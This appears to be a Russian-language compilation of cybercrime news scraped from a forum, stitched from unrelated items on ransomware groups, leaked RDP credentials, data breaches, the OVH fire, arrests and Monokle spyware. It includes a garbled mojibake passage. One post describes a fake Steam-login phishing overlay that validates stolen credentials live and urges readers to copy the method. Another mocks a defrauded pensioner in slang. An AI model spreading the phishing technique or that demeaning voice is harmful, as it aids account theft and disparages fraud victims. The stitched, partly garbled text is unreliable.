Все сайты Avaddon в настоящее время недоступны, и, похоже, шифровальщик прекратил работу. Более того, по данным журналистов, в последние дни фирмы, занимающиеся переговорами с вымогателями, отмечали безумную спешку операторов Avaddon, которые очень торопились завершить все выплаты выкупов. Хакеры оказывали давление на жертв, чтобы те заплатили как можно быстрее, а встречные предложения «переговорщиков» оставались без ответов.
Вероятнее всего, прекращение работы Avaddon связано с повышенным вниманием со стороны правоохранительных органов и правительств всего мира, которые всерьез заинтересовались шифровальщиками после недавних атак на критическую инфраструктуру и компании Colonial Pipeline и JBS.
«Недавние действия правоохранительных органов заставили некоторых злоумышленников понервничать и вот результат. Один выбыл, и будем надеяться, что другие скоро последуют за ним», — прокомментировал Bleeping Computer аналитик компании Emsisoft Бретт Кэллоу.
Издание отмечает, что публикация ключей для расшифровки данных – вовсе не беспрецедентный случай. В прошлом ключи обнародовали операторы малвари TeslaCrypt, Crysis, AES-NI, Shade, FilesLocker, Ziggy и FonixLocker.
• Source: https://www.bleepingcomputer[.]com/...ware-shuts-down-and-releases- decryption-keys/
Группировка предупредила своих партнеров о намерении свернуть все операции.
По данным сразу двух ИБ-компаний, FireEye и Intel 471, киберпреступная группировка DarkSide, стоящая за нашумевшей атакой на американского топливного гиганта Colonial Pipeline, заявила своим партнерам о прекращении деятельности.
Web-сайт DarkSide недоступен с четверга, 13 мая. Как 14 мая сообщал SecurityLab, группировка лишилась доступа к своей инфраструктуре – ее серверы были отключены, а с хакерских форумов удалены все связанные с ней темы. В то время сообщалось, что DarkSide ввела новые ограничения на дальнейшие преступные действия. В частности, были запрещены атаки на социальный сектор (здравоохранение, образовательные учреждения) и государственные организации любой страны. Тем не менее, похоже, теперь группировка решила покинуть кибервымогательский бизнес.
Не исключено также, что заявление о прекращении деятельности было сделано только для отвода глаз. Нередко после заявлений об уходе из бизнеса киберпреступные группировки возвращаются вновь под другими названиями.
В свою очередь, компания Colonial Pipeline заявила о полном восстановлении своих операций после кибератаки. Несмотря на это, несколько юго-восточных штатов все еще страдают от нехватки бензина.
Указанные в базе данных RDP-серверы находятся по всему миру, включая госучреждения в шестидесяти трех странах.
Исследователи в области безопасности похитили с хакерской торговой площадки Ultimate Anonymity Services (UAS) учетные данные 1,3 млн RDP-серверов.
Протокол удаленного рабочего стола (Remote Desktop Protocol) — решение Microsoft для удаленного доступа к приложениям и рабочему столу устройств под управлением Windows. Из-за широкого использования в корпоративных сетях киберпреступники построили процветающую экономику на продаже украденных учетных данных для RDP-серверов.
Получив доступ к сети, злоумышленник может выполнять вредоносные действия,
включая перемещение по сети, кражу данных, установку вредоносных программ на
PoS-терминалы для хищения данных с кредитных карт, установку бэкдоров или
программ-вымогателей.
UAS представляет собой крупнейшую торговую площадку по продаже учетных данных
RDP-серверов, украденных номеров социального страхования и доступа к прокси-
серверам SOCKS. UAS вручную выполняет проверку продаваемых учетных данных,
предлагает поддержку клиентов и дает советы о том, как сохранить удаленный
доступ к скомпрометированному компьютеру.
Торговая площадка не продает доступ к RDP-серверам, расположенным в России или
странах СНГ. Специальный скрипт автоматически удаляет все найденные серверы в
данных регионах.
С декабря 2018 года группа исследователей безопасности имела секретный доступ
к базе данных рынка UAS и в течение трех лет незаметно похищала проданные
учетные данные для RDP-серверов. Эксперты получили IP-адреса, логины и пароли
для 1 379 609 учетных записей, проданных на UAS с конца 2018 года. Базу данных
специалисты передали Виталию Кремезу из ИБ-компании Advanced Intel.
Указанные в базе данных RDP-серверы находятся по всему миру, включая
государственные учреждения шестидесяти трех стран, в том числе Бразилии, Индии
и США. В базе также есть доступ к RDP-серверам известных компаний, в том числе
в сфере здравоохранения.
Как сообщило издание Bleeping Computer, самыми распространенными логинами для
авторизации в RDP-серверах оказались «Administrator», «Admin», «User», «test»
и «scanner». В пятерку наиболее популярных паролей вошли «123456», «123»,
«P@ssw0rd», «1234» и «Password1».
Виталий Кремез запустил сервис под названием RDPwned, позволяющий компаниям и
администраторам проверить, указаны ли их серверы в базе данных.
RDPwned поможет выявить старые случаи взлома, которые так и не были
обнаружены.
Тайваньская компания Acer пострадала от атаки шифровальщика REvil. Злоумышленники требуют у производителя крупнейший в истории выкуп в размере 50 000 000 долларов США. В конце прошлой недели хакеры опубликовали на своем сайте сообщение о том, что они взломали Acer, а в качестве доказательства этого заявления поделились скриншотами якобы похищенных у компании файлов. Среди опубликованных изображений — документы, финансовые таблицы, банковские балансы и банковские сообщения. Представители Acer уже прокомментировали происходящее, но пока избегают открыто говорить об атаке шифровальщика. Выкуп в размере 50 000 000 долларов является крупнейшим на сегодняшний день. Предыдущий «рекорд» равнялся 30 000 000 долларов: такую сумму требовали у взломанной компании Dairy Farm все те же операторы REvil.
Источник:ссылка
Атака повлияла только на работу офисной сети Acer, не нарушив производственные процессы.
Один из крупнейших производителей компьютерной техники, тайваньская компания Acer, стала очередной жертвой вымогательской операции REvil. По данным издания The Record, атака произошла в минувшие выходные, но повлияла только на работу офисной сети Acer, не нарушив производственные процессы.
Представители Acer пока не подтвердили факт вымогательской атаки.
Об инциденте стало известно после того, как название компании появилось сайте REvil, где обычно публикуются документы организаций, не заплативших требуемый выкуп. Вымогатели воздержались от публикации украденных файлов, разместив лишь скриншоты внутренних документов в качестве предупреждения о возможных последствиях отказа от выплаты выкупа.
Однако журналисту The Record совместно с экспертом ИБ-компании Malwarebytes Марсело Риверо (Marcelo Rivero) удалось отследить еще один портал в даркнете, принадлежащий REvil, где была указана сумма в $50 млн, требуемая у Acer за восстановление зашифрованных файлов, - один из крупнейших выкупов на сегодняшний день. В настоящее время доля Acer на мировом рынке составляет 6%, в 4 финансовом квартале прошлого года доход компании составил $3 млрд, по всей видимости, именно поэтому сумма выкупа столь высока.
Судя по переписке представителей Acer и REvil в чате на портале, переговоры сторон зашли в тупик и сейчас неясно, согласится ли компания заплатить требуемую сумму.
6 ноября 2020 года основатель сервиса поиска утечек и мониторинга даркнета
«DLBI» Ашот Оганесян
сообщил, что база
данных сайта «РЖД Бонус» попала в открытый доступ.
Первый информацию об этой утечке опубликовал Telegram-канал DC8044 F33d.
Оганесян пояснил, что резервная копия (бекап) MySQL-дампа с базой данных сайта
«РЖД Бонус» (rzd-bonus.ru) размером около 2.4 ГБ по какой-то непонятной
причине была выложена администратором в корне сайта. Оказалось, что как
минимум несколько человек успели ее скачать до того момента, как сайт стал
недоступен. Вдобавок там же были размещены и доступны для сохранения: bash-
скрипт, в котором был прописан путь к дампу базы данных и находился логин и
пароль пользователя, а также приватный ключ RSA.

Сообщение о находке в Telegram-канале DC8044 F33d.
Оганесян в своей публикации на Facebook напомнил, что скачивать на свой ПК и распространять в сети Интернет подобные архивы нежелательно. Технически это может попасть под некоторые статьи УК РФ, например, ч. 1 ст. 183 УК РФ — незаконное получение и разглашение сведений, составляющих коммерческую тайну; ч. 1 ст. 272 УК РФ — неправомерный доступ к охраняемой законом компьютерной информации.
Оганесян пояснил, что в дампе есть таблица «b_user», в которой 1 360 836
зарегистрированных пользователей. Там есть логины и хешированные пароли (сайт
на Битриксе, поэтому там обычный MD5 с солью), адреса электронной почты, ID-
пользователей, даты регистрации и последнего входа в систему.
В конце августа 2019 года неизвестный пользователь опубликовал в свободном доступе персональные данные 703 тыс. человек, которые предположительно являлись сотрудниками ОАО «РЖД», причем в самом ОАО «РДЖ» на тот момент работало 732 тыс. сотрудников. Среди свободно доступных данных по сотрудникам, включая руководство компании, там была представлена такая информация: ФИО, дата рождения, адрес, номер СНИЛС, должность, фотография, телефон, адрес электронной почты (иногда на доменах NRR.RZD, DZV.ORG.RZD, ORW.RZD и других внутренних доменах ОАО «РЖД»). На сайте с выложенной базой была надпись: «Спасибо ОАО «РЖД» зампредоставленную информацию, путем бережного обращения с персональными данными своих сотрудников».
В декабре 2019 года следственными органами удалось найти злоумышленника, который незаконно скопировал и выложил в интернет данные сотен тысяч сотрудников ОАО «РЖД», в том числе руководства компании. Им оказался двадцатишестилетний житель Краснодарского края. Оказалось, что логин и пароль для входа на корпоративный сайт ОАО «РЖД» случайно увидел на бумажке в паспорте у знакомого.
В ноябре 2019 года специалисты ОАО «РЖД» проводили другое технологическое расследование, касающееся факта взлома (в компании именно так описана произошедшая ситуация) системы беспроводного доступа в сеть высокоскоростного поезда «Сапсан».
15 ноября 2019 года пользователь keklick1337 в своей публикации «Самый беззащитный — это Сапсан» рассказал, что он смог за двадцать минут получить доступ к внутренним сервисам мультимедийного портала «Сапсана», нашел там локально хранящиеся некоторые данные о пассажирах (текущего и прошлых рейсов), а так же обнаружил в этой системе «VPN в сеть РЖД» и написал: «РЖД, поправьте все, через пару месяцев снова проверю».
А уже 21 ноября 2019 года в ОАО «РЖД» сообщили, что в их сети нет критических уязвимостей, используя которые можно получить доступ к действительно важным данным или внутренним сервисам, а угрозы похищения персональных данных при взломе мультимедийной системы поезда «Сапсан» не существует.
Фото
DNA.FR / Jean-Christophe DORN
10 марта в 02:42 по московскому времени облачным провайдером OVH было
опубликовано оповещение о деградации
сервиса в дата-центре SBG1 в
Страсбурге, которое позже было дополнено информацией о пожаре в здании SBG2:
В настоящее время в нашем центре обработки данных в Страсбурге произошел серьезный инцидент, связанный с пожаром в здании SBG2. Пожарные немедленно прибыли на место происшествия, но не смогли справиться с возгоранием в SBG2. Все здание было изолировано, что влияет на все наши услуги на SBG1, SBG2, SBG3 и SBG4. Если ваш сервис хостится в Страсбурге, мы рекомендуем активировать План аварийного восстановления. Все наши бригады полностью мобилизованы вместе с пожарными. Мы будем держать вас в курсе по мере поступления дополнительной информации.
Click to expand...
Фото
DNA.FR / Jean-Christophe DORN
SBG2 является частью кампуса SBG, состоящего из 4 ЦОД. В SBG2 предоставлялись
услуги аренды выделенных серверов (dedicated) и облачные сервисы. И если
облачным сервисам OVH должен был обеспечивать резервное копированием своими
силами, то для арендаторов выделенных серверов эта ситуация в отсутствии
резервных копий может быть фатальной.
Тем временем real-time мониторинг
доступности выделенных серверов в SBG2 рапортует о полной доступности всего
оборудования в ЦОД. Вероятно, сервера мониторинга располагались в том же дата-
центре.
Среди облачных провайдеров, не входящих в "большую тройку" (AWS, Azure и
Google Cloud), OVH является одним из наиболее популярных. Большинство из 27
дата-центров OVH расположены в Европе. Последняя крупная авария у OVH также
произошла в кампусе SBG в 2017 году. В результате отключения электроэнергии
весь кампус SBG был отключен. Сорок минут спустя другой кампус RBX (Рубе,
Франция) потерял связь из-за несвязанной ошибки программного обеспечения в
сетевом оборудовании.
Сочувствуем всем проектам, у кого сервера находились в данном дата-центре, а
остальным напоминаем про давно известный чек-лист:
UPD: В 9:20 по московскому времени пожар
закончился. Судя
по сообщениям Octave Klaba (основателя и владельца OVH) в Twitter, в связи с
близким расположением зданий дата-центров SBG1, SBG3 и SBG4 к сгоревшему SBG2,
пожарным пришлось их "охлаждать", в связи с чем в настоящий момент отсутствует
доступ в эти здания и работа данных ЦОД сегодня восстановлена быть не может.
UPD 2: Octave Klaba оценил в своем Twitter сроки восстановления
работы не
пострадавших от огня ЦОД SBG3, SBG4 и частично SBG1, в 1-2 недели.
](https://habr.com/ru/news/t/546264/)
ФоÑо DNA.FR / Jean-Christophe DORN 10 маÑÑа в 02:42 по моÑковÑÐºÐ¾Ð¼Ñ Ð²Ñемени облаÑнÑм пÑовайдеÑом OVH бÑло опÑбликовано оповеÑение о дегÑадаÑии ÑеÑвиÑа в даÑа-ÑенÑÑе SBG1 в СÑÑаÑбÑÑге, коÑоÑое позже...
 habr.com
"С 1 марта 2021 года нельзя собирать и использовать опубликованные в Интернете сведения об отдельном лице или массово извлекать и осуществлять последующее использование персональных данных с сайтов и прочих ИСПДн в автоматическом режиме (посредством «парсинга»), если не получено согласие каждого субъекта на такие действия. Ссылка на то, что сведения «общедоступны» перестает работать."
Полная статья - https://habr.com/ru/post/544788/
Что думаете по этому поводу? Насколько сильно это усложнит жизнь парсеров, как будут работать эти правила, будут ли они работать вообще, и остальное.
Южная Корея выдала США гражданина Украины Александра Мусиенко, подозреваемого в отмывании денег и кражах на сумму не менее 2,8 млрд долларов, говорится в распространенном в пятницу сообщении Минюста США.
«Согласно обвинительному заключению, Мусиенко обвиняется в участии в масштабной международной схеме по отмыванию денег и мошенничеству, направленной против корпораций и частных лиц США. Предположительно он запустил схему в 2009 году и продолжал до 2012 года», — сказано в сообщении.
По мнению Минюста США, гражданин Украины сотрудничал с киберпреступниками, которые взламывали онлайн-банковские счета компаний и физических лиц в США и крали оттуда деньги.
Кроме того, через подставные фирмы Мусиенко создал в США сеть из людей, которые согласились за вознаграждение переводить ему украденные деньги. В итоге взломщики направляли украденные средства на счета этих людей, а те перечисляли их за рубеж Мусиенко, считает обвинение.
__https://twitter.com/x/status/1359048125403590660
По словам злоумышленников, они похитили исходный код игр Cyberpunk 2077, Witcher 3, Gwent и даже «неизданной версии Witcher 3».
Польский разработчик компьютерных игр CD Projekt стал жертвой кибератаки с использованием вымогательского ПО. Злоумышленникам удалось получить доступ к его внутренней компьютерной сети, зашифровать некоторые устройства и похитить «определенные данные».
Компания CD Projekt опубликовала в Twitter оставленную хакерами записку с требованием выкупа. По словам злоумышленников, они похитили исходный код игр Cyberpunk 2077, Witcher 3, Gwent и даже «неизданной версии Witcher 3». Киберпреступники угрожают опубликовать его, а также юридические, финансовые и другие внутренние документы компании, если с ней «не будет достигнуто соглашения».
Согласно заявлению CD Projekt, компания обезопасила свою IT-инфраструктуру, начала восстанавливать данные из резервных копий, уведомила об инциденте правоохранительные органы и обратилась за помощью к ИБ-специалистам.
Атака на CD Projekt последовала за неудачным выпуском игры Cyberpunk 2077, которая была выпущена со многими багами и проблемами с производительностью на ПК и старых консолях. Sony даже исключила игру из PlayStation Store и возвращает деньги пользователям. Microsoft также предлагает вернуть деньги.
В США при участии Федерального бюро расследований (ФБР) задержан россиянин Максим Бойко, который подозревается в отмывании денежных средств международной кибергруппы QQAAZZ и которому может грозить до 20 лет лишения свободы.
29-летний россиянин, начиная с 2015 года, якобы занимается отмыванием незаконно полученных денежных средств при посредничестве QQAAZZ, в том числе с помощью конвертаций в криптовалюты и нескольких счетов в зарубежных банках, согласно показаниям агента ФБР Саманты Шельник, среди других документов переданным в федеральный суд Западного округа Пенсильвании.
ФБР заподозрило россиянина в незаконной деятельности, изучив коммуникацию по нескольким связанным с Бойко и другими участниками QQAAZZ почтовым ящикам Google.
Также были изучены аккаунты россиянина в Apple iCloud и Instagram, указывается в судебных материалах. Среди прочего отмечается, что Бойко обменивался информацией с помощью зашифрованных платформ мгновенных сообщений Jabber, включая «exploit.im» — «почти исключительно используемый среди киберпреступников».
Группа QQAAZZ занимается кражей денежных средств, предварительно получая банковские данные жертв с помощью вредоносного программного обеспечения. Также она предлагает другим киберпреступникам доступ к заранее подготовленным банковским счетам для отмывания денежных средств, похищенных с онлайн-счетов жертв.
Наряду с Бойко по обвинению в участии в незаконной деятельности кибергруппы в США задержаны также пять граждан Латвии.
• Source: http://www.documentcloud.org/documents/6821383-Maksim-Boiko.html
Известно, что в январе россиянин приехал в США вместе с супругой, на таможне задекларировав 20 тысяч долларов (более 1,5 миллиона рублей) наличными. По его словам, их он получил в результате сдачи недвижимости и инвестирования.
«Для сокрытия своей истинной личности преступник иногда использовал псевдоним «Gangass ». Он использовал защищенную и зашифрованную платформу Jabber для мгновенного обмена сообщениями, чтобы скрыть свою связь с киберпреступной деятельностью», — сообщило ведомство.
Информация по банковскому счету показала, что злоумышленник получил денежные средства в размере $387 964 и вывел 136 биткойнов на сумму $865 748 (по тогдашнему курсу).
Обратите внимание на сайт ezz-skins.pw (не реклама) , при нажатие на войти в
стим вылазит модальное окно якобы новой вкладке, где URL действительно
стимовский, но если залезть в исходный код страницы то видео что это модальное
окно построенное сайтом и тот URL стима это просто input строка, ранее я с
подобным не встречался, но это не самое сладкое, каким то образом у них есть
скрипт который проверяет твой логин и пароль на правильность, и если он
правильный то требует стимгвард код, если не правильный то так и пишет - логин
или пароль неверный, любители побаловаться возьмите себе подобный метод на
заметку, а честные пользователи - будьте аккуратны.
Операторы, имеющие лицензию на оказание услуг связи, будут обязаны предоставлять Роскомнадзору (РКН) данные, позволяющие идентифицировать средства связи и пользовательское оборудование в интернете. Мера направлена на предотвращение доступа к информации, распространение которой ограничено на территории России, а также на защиту граждан от возможного вреда, [пишут](https://www.vedomosti.ru/technology/articles/2024/12/18/1082164-roskomnadzor- nameren-kontrolirovat-vse-popitki-obhoda-blokirovok) «Ведомости», ссылаясь на документы, опубликованные ведомством.
РКН сможет получать данные об интернет-пользователях, которые посещают заблокированные на территории России сайты, уточняет издание. В пояснительной записке указано, что приказ разработан с целью исполнения мер в соответствии с законом от 8 августа 2024 г. №216, который, в свою очередь, вносит изменения в закон «Об информации, информационных технологиях и о защите информации» и отдельные законодательные акты РФ». Поправки касаются запрета на распространение материалов, оскорбляющих человеческое достоинство и общественную нравственность, демонстрирующих действия с признаками противоправных, в том числе насильственных, мотивированных хулиганскими или корыстными побуждениями.
Начать получать информацию от операторов связи РКН должен в течение трех месяцев со дня вступления приказа в силу. Для выполнения новых требований планируется использовать технические средства противодействия угрозам (ТСПУ), которые обязательны для операторов с 2019 года.
В документе уточняется, что операторы связи обязаны предоставить информацию, идентифицирующую средства связи и пользовательское оборудование, в течение 15 рабочих дней с даты начала оказания услуг по предоставлению доступа к интернету или с момента присоединения к их сети другого оператора связи, уже предоставляющего услуги по предоставлению доступа к интернету.
Федеральная служба безопасности России пресекла деятельность международной сети колл-центров, действовавшей в интересах бывшего министра обороны Грузии Давида Кезерашвили. По данным ЦОС ФСБ, от действий мошенников пострадало около 100 тыс. человек более чем из 50 стран, включая страны ЕС, Великобританию, Канаду, Бразилию, Индию и Японию.
Согласно информации ведомства, колл-центры входили в состав международного организованного преступного сообщества и занимались мошенничеством под видом инвестсделок. По оценкам ФСБ, ежедневный доход колл-центров достигал $1 млн. Мошенники действовали в интересах экс-министра обороны Грузии и основателя «Милтон-групп» Давида Кезерашвили, скрывающегося в Лондоне.
Один из руководителей сети колл-центров гражданин Израиля и Украины Я. Д. Кесельман задержан. Второй, гражданин Израиля и Грузии Д. Тодва, объявлен в розыск. По сведениям спецслужбы, фигуранты дела в 2022 году по заданию Службы безопасности Украины распространяли анонимные сообщения о готовящихся террористических актах на объектах критической инфраструктуры Москвы, Курска, Брянска и Белгорода.
Всего задержано 11 руководителей и сотрудников российских офисов колл-центров. Следственное управление ФСБ возбудило уголовное дело по ст. 210 (организация преступного сообщества), ч. 4 ст. 159 (мошенничество в особо крупном размере) и ч. 3 ст. 207 (заведомо ложное сообщение об акте терроризма) УК РФ.
В конце ноября Лефортовский суд Москвы заочно арестовал Давида Кезерашвили. Источник ТАСС утверждал, что его объявили в международный розыск по делу об особо крупном мошенничестве. Господин Кезерашвили ранее был объявлен в розыск в России по делу о военных преступлениях в Южной Осетии во время войны 2008 года.
Давид Кезерашвили возглавлял Минобороны Грузии в 2006–2008 годах при президенте Михаиле Саакашвили. После смены власти в Грузии в 2012 году в отношении господина Кезерашвили было возбуждено несколько уголовных дел, он уехал из страны. В 2021 году в Грузии его заочно приговорили к пяти годам лишения свободы по делу о растрате госсредств.
kommersant.ru/doc/7362411
По [оценкам](https://iz.ru/1803168/sergei-guranov/golodnye-igry-biznes-vzal- podgotovku-aitisnikov-v-vuzah-v-svoi-ruki) государства, вузов и бизнеса, IT- отрасли РФ не хватает от 740 тыс. до 1 млн сотрудников, а к 2030 году нужно будет обучить и подготовить ещё более 2 млн человек. На фоне кадрового дефицита IТ-компании стали сами оплачивать обучение будущим работникам. Эксперты считают, что конкурентная борьба за специалистов продолжится, причём основной упор на поиск сотрудников будет происходить в университетах.
В IT-компаниях рассказали СМИ, что рынок труда сейчас очень динамично переманивает специалистов. Работодатели стараются сохранить на рабочем месте сотрудников самыми разными бонусами помимо повышения зарплаты, например, предоставляют ДМС, технику для работы, гибкий рабочий график и другие нематериальные способы мотивации.
Директор 1С и руководитель комитета по образованию АПКИТ (Ассоциация предприятий компьютерных и информационных технологий) Борис Нуралиев сообщил, что в России примерно 3% от всех работающих заняты в IT-отрасли. По данным Минцифры, этот показатель составляет 2%. По этому показателю Россия догоняет Румынию и Словению, но в странах Северной Европы в сфере занято втрое больше людей. А в среднем по ЕС на IT-специалистов приходится около 4,6% рынка труда.
По оценкам АПКИТ, к 2030 году в России число IT-работников в экономике должно будет составлять минимум 4,9%. Это означает, что за 2025–2030 годы нужно привлечь 2 млн новых специалистов высшей квалификации и 700 тыс. средней квалификации. В IT-компаниях считают, что именно нехватка специалистов мешает им развиваться.
В IT-отрасли считают, что повышать надо не только количество, но и качество подготовки кадров в вузах. Также сейчас появилось достаточно много ускоренных программ обучения: онлайн, офлайн и гибридных форматов, где за 3–6 месяцев или за год обучают профессиональным навыкам в области IT. Но эти курсы не могут закрыть все требования компаний.
В настоящее время в Москве и Петербурге на одну вакансию приходят 4–5 резюме от джунов. Но вот фундаментального образования, а также системного, критического и креативного мышления они оказываются лишены. По мнению представителей IT-отрасли, вузы должны быть гибкими, быстро реагировать на изменения в мире технологий и науки, но при этом сохранять фундаментальный подход к обучению.
В части IT-компаний пояснили, что с фундаментальной подготовкой в вузах «стало совсем плохо», потому что университеты дают только стек технологий, то есть некий набор инструментов. И фундаментальности в образовании не хватает как раз тем, кто со временем мог бы сыграть ключевую роль в компаниях.
При этом к качеству джунов, которых выпускают вузы, у бизнеса также есть вопросы. В IT-компаниях считают, что преподаванием хард-скилов в университетах должны заниматься практики, то есть их сотрудники. Например, в ИТМО до 80–85% дисциплин и модулей, связанных с хард-скилами, обеспечиваются не штатными преподавателями университета, а специалистами из бизнеса.
Например, программа по развитию системы обучения в сфере ИТАТ «Газпром нефть» выстроена так, чтобы IT-специалистов для компании и её партнёров в вузах на 70% готовили именно сотрудники разработчиков ПО. Компания вкладывается в вузы, даже если не все студенты оттуда пойдут затем работать именно в их организации. Фактическая ситуация такова, что и за студентов нужно бороться, а сэкономить на них не получится, так как нужно вкладываться и в обучение, и в оплату труда.
В IT-отрасли считают, что практика и стажировки для студентов должны быть оплачиваемыми, что повышает интерес к работе внутри компании, но пока что не все компании используют эту ситуацию в своих целях.
Руководитель направления по работе с образовательными организациями «Базальт СПО» Татьяна Губина пояснила СМИ, что преподавателей-практиков, которые могут грамотно читать курсы и донести информацию по материалу до студентов, очень мало. Другие эксперты и вузы опасаются, что практики просто займут места штатных преподавателей, выдавив их из университетов. С другой стороны, IT- отрасль понимает, что очень важно сохранить в вузах преподавателей, которые могут обеспечить фундаментальную подготовку, а профессиональным навыкам большинство компаний может научить самостоятельно уже в процессе стажировки, так как научить работать со всем циклом и сформировать мышление в вузе сразу не получается из-за отсутствия нужных компетенций даже у лучших практиков.
В начале ноября СМИ сообщили, что нехватка инженерных кадров в РФ составляет примерно 600 тыс. специалистов, а каждая пятая российская компания активно ищет инженеров. Представители высших учебных заведений и телекоммуникационных компаний РФ также заявили, что в информационной отрасли существует острый дефицит инженеров, несмотря на рост зарплат. По их мнению, студенты вузов сейчас больше ориентируются на работу с искусственным интеллектом, чем на инженерию.
Ранее глава «Сбера» Герман Греф рассказал, что дефицит IT-специалистов в РФ составляет 1 млн человек. По его словам, в ближайшие годы покрыть эту нехватку разработчиков и инженеров будет нельзя.
© [https://carding.pro/it-otrasli-rf-n...enie-budushhim-rabotnikam-iz-za- konkurenczii/](https://carding.pro/it-otrasli-rf-ne-hvataet-do-1-mln- sotrudnikov-it-kompanii-oplachivayut-obuchenie-budushhim-rabotnikam-iz-za- konkurenczii/)
Рано утром неизвестный застрелил идущего по Манхэттену главу страховой компании «UnitedHealthcare» Брайана Томпсона, а затем скрылся на велосипеде.
По случайности в Нью-Йорке нашелся паренёк, который в качестве хобби делал небольшой проект по визуализации перемещения всех прокатных великов в городе. Он увидел историю об убийстве за утренним кофе и тут же принялся за свое дело.
Он мгновенно выяснил, что с места убийства в промежутке 10 минут отъехало лишь 8 велосипедов, но только один — в нужном полиции направлении. Он собрал всю инфу, пробил по базам и передал полиции.
— Сейчас полиция ведёт охоту на киллера и пробивает зацепки юного айти-гения. Преступника всё ещё ищут — за его голову назначена награда в $10 тысяч.
meduza.io/feature/2024/12/05/na-manhettene-nedaleko-ot-tsentralnogo-parka- zastrelili-ispolnitelnogo-direktora-unitedhealthcare-odnoy-iz-krupneyshih-v- ssha-kompaniy-po-medstrahovaniyu
История мамонтизации 74-летнего деда из Питера началась со звонка от неизвестного парня. Он, будучи на другом конце трубы, заявил, что старому срочно надо задекларировать свои похоронные. Скамер убедил пенса, что для этого нужно снять деньги со счетов и передать ему лично в руки.
Тогда дедус не растерялся и удачно отдал скамеру 1.4 миллиона рублей, 4.100 евро и 3.000 долларов (в общей сумме 2.2 миллиона рублей). Тогда скамерсант заявил, что деньги вернут ему обратно с помощью дрона, который прилетит на балкон. Обусловлено это было возрастом бедолаги, чтобы он не делал лишних телодвижений.
— Для оформления возврата похоронных лохматому пенсионеру необходимо было выстрелить из сигнального пистолета. Без задних мыслей мамонт согласился, вышел на балкон и сделал 3 выстрела. Посмеявшись в трубку, звонивший бросил ее. К слову, в полицию обратился не сам старик, а его соседи, которые были в шоке от произошедшего.
Российские власти установили шпионскую программу на телефон Кирилла Парубца, системного аналитика с украинскими корнями, после его задержания в Москве в апреле 2024 года. По словам Парубца, его телефон был заражён шпионским ПО, вероятно, в момент, когда он был вынужден предоставить свой пароль под угрозой насилия. Этот случай даёт уникальную возможность заглянуть в практику российских спецслужб, которые используют не самые высокотехнологичные методы для слежки за своими гражданами, а скорее прибегают к простым, но эффективным способам.
Кирилл Парубец — российский системный аналитик, который идентифицирует себя как украинец. Он жил в Киеве с 2020 года, активно поддерживал Украину в её борьбе с российской агрессией, предоставляя как финансовую, так и гуманитарную помощь. В 2023 году с женой они решили вернуться в Россию для решения вопросов, связанных с получением гражданства Молдовы, чтобы оставаться в Украине. Однако возвращение в Россию обернулось для них трагедией.
18 апреля 2024 года, в 6:30 утра, в их московскую квартиру ворвались шесть сотрудников ФСБ с оружием. По словам Парубца, силовики избили его и его жену, разделили их и начали допрашивать. Они задавали вопросы о переводах денег в Украину и его другом Иванове, которого, как оказалось, также интересовали спецслужбы. В ходе допроса Парубцу требовали назвать пароль от его телефона. Под угрозой насилия он сдал свой код.
Вскоре Кирилла и его жену задержали, и они были отправлены на 15 суток административного ареста. Во время заключения Парубец испытал не только физическое насилие, но и психическое давление, когда сотрудники ФСБ начали угрожать им тюремным сроком за помощь Украине. Спецслужбы требовали, чтобы Парубец сотрудничал с ними, предоставив информацию о своём друге Иванове, который, по утверждениям ФСБ, общался с украинскими спецслужбами. Угрозы продолжались, и, чтобы спасти себя и жену, Кирилл согласился сотрудничать с ФСБ, хотя в действительности не собирался выполнять их требования.
После того как Кирилла и его жену освободили, они решили забрать свои вещи из изъятой квартиры, включая телефон Кирилла. Однако вскоре он заметил странную активность на устройстве: появился незнакомый уведомление с текстом "Arm cortex vx3 synchronization", которое исчезло, а затем телефон перезагрузился.
Кирилл, обладая опытом в области информационной безопасности, сразу начал проверку своего устройства и обнаружил подозрительное приложение, которое имело доступ ко множеству личных данных на его телефоне. Он связался с правозащитной организацией Первый отдел , которая обратилась за помощью в Citizen Lab — исследовательскую группу, специализирующуюся на безопасности.
Эксперты из Citizen Lab подтвердили, что обнаруженное приложение является шпионской программой. Это была модифицированная версия приложения Cube Call Recorder — обычного приложения для записи звонков, которое, однако, в случае с Кириллом, обладало целым рядом дополнительных функций. Оно могло получать информацию о местоположении, читать и отправлять текстовые сообщения, записывать видео и делать скриншоты, а также устанавливать другие приложения и следить за действиями пользователя.
Исследования также показали, что эта программа является новой версией вируса Monokle — одного из самых известных шпионских ПО, разработанных для российских спецслужб. По мнению исследователей, Monokle был создан Специальным технологическим центром из Санкт-Петербурга, который ранее уже был обвинён в помощи российским разведывательным службам.
Для экспертов, таких как Купер Квинтин из Citizen Lab, этот случай является важным напоминанием о том, что шпионские атаки не всегда происходят через сложные хакерские атаки с дистанционного управления. Иногда достаточно просто получить физический доступ к телефону человека, чтобы установить шпионское ПО. Эта практика, хотя и не столь технически сложная, имеет свои опасности.
"Многие думают, что шпионские атаки всегда связаны с эксплойтами и нулевыми днями, но никто не обращает внимания на то, что человек, который может заставить вас разблокировать телефон под угрозой насилия, представляет такую же угрозу", — сказал Квинтин.
Эксперты утверждают, что любой человек, чье устройство было конфисковано силовыми органами, должен считать его скомпрометированным и больше не доверять его безопасности. Этот случай также поднимает важный вопрос о масштабах репрессий в России и возможной угрозе для граждан, которые попадают в поле зрения спецслужб. Дмитрий Зайр-Бек, руководитель правозащитной организации Первый отдел , подчеркнул, что такие действия становятся всё более распространёнными, и есть опасение, что они могут затронуть ещё больше людей, особенно тех, кто приезжает в Россию из западных стран или Украины.
Кириллу Парубцу и его жене удалось покинуть Россию, и это, по всей видимости, стало возможным благодаря тому, что Кирилл оставил свой заражённый телефон в Москве, чтобы создать впечатление, что он остался в стране.
В отчете Квинтин и его коллеги пришли к выводу, что "каждый человек, чье устройство было конфисковано службой безопасности, должен предполагать, что его устройство больше нельзя доверять".
Дмитрий Зайр-Бек, глава правозащитного проекта First Department, осудил российское правительство и предупредил, что то, что произошло с Парубцом, может произойти и с другими.
"Мы ожидали, что что-то подобное может произойти с Кириллом Парубцом, потому что это идеально соответствует логике российских спецслужб. Масштабы репрессий действительно пугают, и основной проблемой является то, что уже нет 'красных линий' того, что разрешено", — сказал Зайр-Бек в интервью TechCrunch. "Кроме украинцев, граждане западных стран, которые посещают Россию, находятся в группе повышенного риска. Они являются привлекательной целью для вербовки и потенциального заключения в качестве заложников".
После освобождения Парубец сказал, что он и его жена покинули Россию. В ироничном повороте, его телефон с шпионской программой мог помочь ему сбежать, так как он оставил его в Москве.
